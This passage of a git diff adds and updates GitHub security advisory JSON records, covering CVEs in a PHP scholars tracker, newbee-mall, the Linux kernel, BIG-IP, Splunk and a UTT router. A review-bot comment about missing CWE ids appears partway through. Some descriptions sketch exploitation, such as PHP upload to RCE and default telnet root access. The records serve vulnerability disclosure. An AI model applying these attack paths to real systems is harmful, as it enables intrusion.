@@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8rqj-9226-cwx7", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70151" + ], + "details": "code-projects Scholars Tracking System 1.0 allows an authenticated attacker to achieve remote code execution via unrestricted file upload. The endpoints update_profile_picture.php and upload_picture.php store uploaded files in a web-accessible uploads/ directory using the original, user-supplied filename without validating the file type or extension. By uploading a PHP file and then requesting it from /uploads/, an attacker can execute arbitrary PHP code as the web server user.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70151" + }, + { + "type": "WEB", + "url": "https://code-projects.org/scholars-tracking-system-in-php-with-source-code" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70151-Scholars-FileUpload-RCE" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json b/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json new file mode 100644 index 0000000000000..f4c8d9cba9d5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json 
@@ -0,0 +1,96 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pjv-cqr5-4xh7", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:41Z", + "aliases": [ + "CVE-2026-2658" + ], + "details": "A vulnerability was found in newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee. Affected is an unknown function of the component Multiple Endpoints. Performing a manipulation results in cross-site request forgery. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2658" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/106" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/107" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752797" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752798" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752799" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752800" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752801" + }, + { + "type": "WEB", 
+ "url": "https://vuldb.com/?submit.752802" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752803" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752804" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752805" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752806" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json new file mode 100644 index 0000000000000..8a83d4beed92d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json 
@@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9wwr-2jh3-482p", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23220" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix infinite loop caused by next_smb2_rcv_hdr_off reset in error paths\n\nThe problem occurs when a signed request fails smb2 signature verification\ncheck. In __process_request(), if check_sign_req() returns an error,\nset_smb2_rsp_status(work, STATUS_ACCESS_DENIED) is called.\nset_smb2_rsp_status() set work->next_smb2_rcv_hdr_off as zero. By resetting\nnext_smb2_rcv_hdr_off to zero, the pointer to the next command in the chain\nis lost. Consequently, is_chained_smb2_message() continues to point to\nthe same request header instead of advancing. If the header's NextCommand\nfield is non-zero, the function returns true, causing __handle_ksmbd_work()\nto repeatedly process the same failed request in an infinite loop.\nThis results in the kernel log being flooded with \"bad smb2 signature\"\nmessages and high CPU usage.\n\nThis patch fixes the issue by changing the return value from\nSERVER_HANDLER_CONTINUE to SERVER_HANDLER_ABORT. 
This ensures that\nthe processing loop terminates immediately rather than attempting to\ncontinue from an invalidated offset.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23220" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5accdc5b7f28a81bbc5880ac0b8886e60c86e8c8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/71b5e7c528315ca360a1825a4ad2f8ae48c5dc16" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9135e791ec2709bcf0cda0335535c74762489498" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f7b1c2f5642bbd60b1beef1f3298cbac81eb232c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json b/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json index 56e6e2ccb704d..2b556ed679ad7 100644 --- a/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json +++ b/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c56r-fcf4-6rp2", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-18T18:30:35Z", "published": "2026-02-17T21:31:14Z", "aliases": [ "CVE-2026-22769" @@ -19,6 +19,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22769" }, + { + "type": "WEB", + "url": "https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-22769" + }, { "type": "WEB", "url": "https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079" 
diff --git a/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json b/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json
new file mode 100644
index 0000000000000..d042df595b1e6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-chpq-fr33-gp2m",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-2507"
+ ],
+ "details": "When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2507"
+ },
+ {
+ "type": "WEB",
+ "url": "https://my.f5.com/manage/s/article/K000160003"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T17:21:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json b/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json
new file mode 100644
index 0000000000000..9787b8ae1e39c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f2fg-5m3g-hqwv",
+ "modified": "2026-02-18T18:30:39Z",
+ "published": "2026-02-18T18:30:39Z",
+ "aliases": [
+ "CVE-2025-65519"
+ ],
+ "details": "mayswind ezbookkeeping versions 1.2.0 and earlier contain a critical vulnerability in JSON and XML file import processing. The application fails to validate nesting depth during parsing operations, allowing authenticated attackers to trigger denial of service conditions by uploading deeply nested malicious files. This results in CPU exhaustion, service degradation, or complete service unavailability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65519"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ictrun/EBK-SA-2025-001"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-674"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:28Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json b/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json
new file mode 100644
index 0000000000000..02ecb48a96ecf
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f5pv-9whq-7mv7",
+ "modified": "2026-02-18T18:30:41Z",
+ "published": "2026-02-18T18:30:41Z",
+ "aliases": [
+ "CVE-2026-20144"
+ ],
+ "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.7, 9.3.8, and 9.2.11, and Splunk Cloud Platform versions below 10.2.2510.0, 10.1.2507.11, 10.0.2503.9, and 9.3.2411.120, a user of a Splunk Search Head Cluster (SHC) deployment who holds a role with access to the the Splunk _internal index could view the Security Assertion Markup Language (SAML) configurations for Attribute query requests (AQRs) or Authentication extensions in plain text within the conf.log file, depending on which feature is configured.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20144"
+ },
+ {
+ "type": "WEB",
+ "url": "https://advisory.splunk.com/advisories/SVD-2026-0209"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T18:24:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json
index 19cf6653aedee..2b5fbe79d83f6 100644
--- a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json
+++ b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f7cx-4c4g-9g59",
- "modified": "2026-02-18T15:31:26Z",
+ "modified": "2026-02-18T18:30:38Z",
 "published": "2026-02-18T15:31:26Z",
 "aliases": [
 "CVE-2025-61982"
@@ -22,6 +22,10 @@
 {
 "type": "WEB",
 "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2292"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2292"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json
new file mode 100644
index 0000000000000..8e276b81e5f52
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json
@@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7pj-q7w5-89fg", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71236" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Validate sp before freeing associated memory\n\nSystem crash with the following signature\n[154563.214890] nvme nvme2: NVME-FC{1}: controller connect complete\n[154564.169363] qla2xxx [0000:b0:00.1]-3002:2: nvme: Sched: Set ZIO exchange threshold to 3.\n[154564.169405] qla2xxx [0000:b0:00.1]-ffffff:2: SET ZIO Activity exchange threshold to 5.\n[154565.539974] qla2xxx [0000:b0:00.1]-5013:2: RSCN database changed – 0078 0080 0000.\n[154565.545744] qla2xxx [0000:b0:00.1]-5013:2: RSCN database changed – 0078 00a0 0000.\n[154565.545857] qla2xxx [0000:b0:00.1]-11a2:2: FEC=enabled (data rate).\n[154565.552760] qla2xxx [0000:b0:00.1]-11a2:2: FEC=enabled (data rate).\n[154565.553079] BUG: kernel NULL pointer dereference, address: 00000000000000f8\n[154565.553080] #PF: supervisor read access in kernel mode\n[154565.553082] #PF: error_code(0x0000) - not-present page\n[154565.553084] PGD 80000010488ab067 P4D 80000010488ab067 PUD 104978a067 PMD 0\n[154565.553089] Oops: 0000 1 PREEMPT SMP PTI\n[154565.553092] CPU: 10 PID: 858 Comm: qla2xxx_2_dpc Kdump: loaded Tainted: G OE ------- --- 5.14.0-503.11.1.el9_5.x86_64 #1\n[154565.553096] Hardware name: HPE Synergy 660 Gen10/Synergy 660 Gen10 Compute Module, BIOS I43 09/30/2024\n[154565.553097] RIP: 0010:qla_fab_async_scan.part.0+0x40b/0x870 [qla2xxx]\n[154565.553141] Code: 00 00 e8 58 a3 ec d4 49 89 e9 ba 12 20 00 00 4c 89 e6 49 c7 c0 00 ee a8 c0 48 c7 c1 66 c0 a9 c0 bf 00 80 00 10 e8 15 69 00 00 <4c> 8b 8d f8 00 00 00 4d 85 c9 74 35 49 8b 84 24 00 19 00 00 48 8b\n[154565.553143] RSP: 0018:ffffb4dbc8aebdd0 EFLAGS: 00010286\n[154565.553145] RAX: 0000000000000000 RBX: ffff8ec2cf0908d0 RCX: 0000000000000002\n[154565.553147] RDX: 0000000000000000 
RSI: ffffffffc0a9c896 RDI: ffffb4dbc8aebd47\n[154565.553148] RBP: 0000000000000000 R08: ffffb4dbc8aebd45 R09: 0000000000ffff0a\n[154565.553150] R10: 0000000000000000 R11: 000000000000000f R12: ffff8ec2cf0908d0\n[154565.553151] R13: ffff8ec2cf090900 R14: 0000000000000102 R15: ffff8ec2cf084000\n[154565.553152] FS: 0000000000000000(0000) GS:ffff8ed27f800000(0000) knlGS:0000000000000000\n[154565.553154] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[154565.553155] CR2: 00000000000000f8 CR3: 000000113ae0a005 CR4: 00000000007706f0\n[154565.553157] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[154565.553158] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[154565.553159] PKRU: 55555554\n[154565.553160] Call Trace:\n[154565.553162] \n[154565.553165] ? show_trace_log_lvl+0x1c4/0x2df\n[154565.553172] ? show_trace_log_lvl+0x1c4/0x2df\n[154565.553177] ? qla_fab_async_scan.part.0+0x40b/0x870 [qla2xxx]\n[154565.553215] ? __die_body.cold+0x8/0xd\n[154565.553218] ? page_fault_oops+0x134/0x170\n[154565.553223] ? snprintf+0x49/0x70\n[154565.553229] ? exc_page_fault+0x62/0x150\n[154565.553238] ? 
asm_exc_page_fault+0x22/0x30\n\nCheck for sp being non NULL before freeing any associated memory", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71236" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1a9585e4c58d1f1662b3ca46110ed4f583082ce5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/40ae93668226b610edb952c6036f607a61750b57" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/944378ead9a48d5d50e9e3cc85e4cdb911c37ca1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/949010291bb941d53733ed08a33454254d9afb1b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json b/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json new file mode 100644 index 0000000000000..f089e1845901b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fqrv-m9rv-j33j",
+ "modified": "2026-02-18T18:30:39Z",
+ "published": "2026-02-18T18:30:39Z",
+ "aliases": [
+ "CVE-2025-70998"
+ ],
+ "details": "UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70998"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cha0yang1/UTT-nv810v4-telnet-backdoor"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1188"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json
new file mode 100644
index 0000000000000..d0f1a3d713ba5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json
@@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3vh-wfh4-fp76", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23227" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/exynos: vidi: use ctx->lock to protect struct vidi_context member variables related to memory alloc/free\n\nExynos Virtual Display driver performs memory alloc/free operations\nwithout lock protection, which easily causes concurrency problem.\n\nFor example, use-after-free can occur in race scenario like this:\n```\n\tCPU0\t\t\t\tCPU1\t\t\t\tCPU2\n\t----\t\t\t\t----\t\t\t\t----\n vidi_connection_ioctl()\n if (vidi->connection) // true\n drm_edid = drm_edid_alloc(); // alloc drm_edid\n ...\n ctx->raw_edid = drm_edid;\n ...\n\t\t\t\t\t\t\t\tdrm_mode_getconnector()\n\t\t\t\t\t\t\t\t drm_helper_probe_single_connector_modes()\n\t\t\t\t\t\t\t\t vidi_get_modes()\n\t\t\t\t\t\t\t\t if (ctx->raw_edid) // true\n\t\t\t\t\t\t\t\t drm_edid_dup(ctx->raw_edid);\n\t\t\t\t\t\t\t\t if (!drm_edid) // false\n\t\t\t\t\t\t\t\t ...\n\t\t\t\tvidi_connection_ioctl()\n\t\t\t\t if (vidi->connection) // false\n\t\t\t\t drm_edid_free(ctx->raw_edid); // free drm_edid\n\t\t\t\t ...\n\t\t\t\t\t\t\t\t drm_edid_alloc(drm_edid->edid)\n\t\t\t\t\t\t\t\t kmemdup(edid); // UAF!!\n\t\t\t\t\t\t\t\t ...\n```\n\nTo prevent these vulns, at least in vidi_context, member variables related\nto memory alloc/free should be protected with ctx->lock.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23227" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0cd2c155740dbd00868ac5a8ae5d14cd6b9ed385" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/60b75407c172e1f341a8a5097c5cbc97dbbdd893" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + 
"nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json b/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json index f34fed717a9c1..844bd1e2c59c4 100644 --- a/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json +++ b/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4wf-v389-9w53", - "modified": "2026-02-03T09:30:28Z", + "modified": "2026-02-18T18:30:22Z", "published": "2026-02-03T09:30:28Z", "aliases": [ "CVE-2026-1591" diff --git a/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json new file mode 100644 index 0000000000000..39c71f21b1a2e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json 
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h437-rr98-fx56",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-23223"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix UAF in xchk_btree_check_block_owner\n\nWe cannot dereference bs->cur when trying to determine if bs->cur\naliases bs->sc->sa.{bno,rmap}_cur after the latter has been freed.\nFix this by sampling before type before any freeing could happen.\nThe correct temporal ordering was broken when we removed xfs_btnum_t.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23223"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/1d411278dda293a507cb794db7d9ed3511c685c6"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/ba5264610423d9653aa36920520902d83841bcfd"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/ed82e7949f5cac3058f4100f3cd670531d41a266"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json
new file mode 100644
index 0000000000000..b92de6f89b751
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-hcrc-x9p4-f9jh",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2025-70152"
+ ],
+ "details": "code-projects Community Project Scholars Tracking System 1.0 is vulnerable to SQL Injection in the admin user management endpoints /admin/save_user.php and /admin/update_user.php. These endpoints lack authentication checks and directly concatenate user-supplied POST parameters (firstname, lastname, username, password, user_id) into SQL queries without validation or parameterization.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70152"
+ },
+ {
+ "type": "WEB",
+ "url": "https://code-projects.org/scholars-tracking-system-in-php-with-source-code"
+ },
+ {
+ "type": "WEB",
+ "url": "https://youngkevinn.github.io/posts/CVE-2025-70152-Scholars-SQLi-Missing-Auth"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T18:24:21Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json b/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json
index 1ffb44e84eae6..11e3ba70bf164 100644
--- a/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json
+++ b/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json
@@ -33,7 +33,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-400"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
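Review bot: `cwe_ids` is empty in the new GHSA-hcrc-x9p4-f9jh record even though `details` names two distinct weaknesses, SQL injection and missing authentication on the admin endpoints, and the record is rated CRITICAL. Triage that filters or groups advisories by CWE will not surface it; if the upstream record carries no CWE yet, the likely fit is `"cwe_ids": ["CWE-89", "CWE-306"]`, to be confirmed at review. The same gap is visible in GHSA-m4v3-95xp-3j5h (missing authentication) and GHSA-v3v9-r7ff-976x (SQL injection), which also leave `severity` empty.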
diff --git a/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json
new file mode 100644
index 0000000000000..25b2b77eec1f3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json
@@ -0,0 +1,41 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-j6h2-wr53-6vcg",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-23228"
+ ],
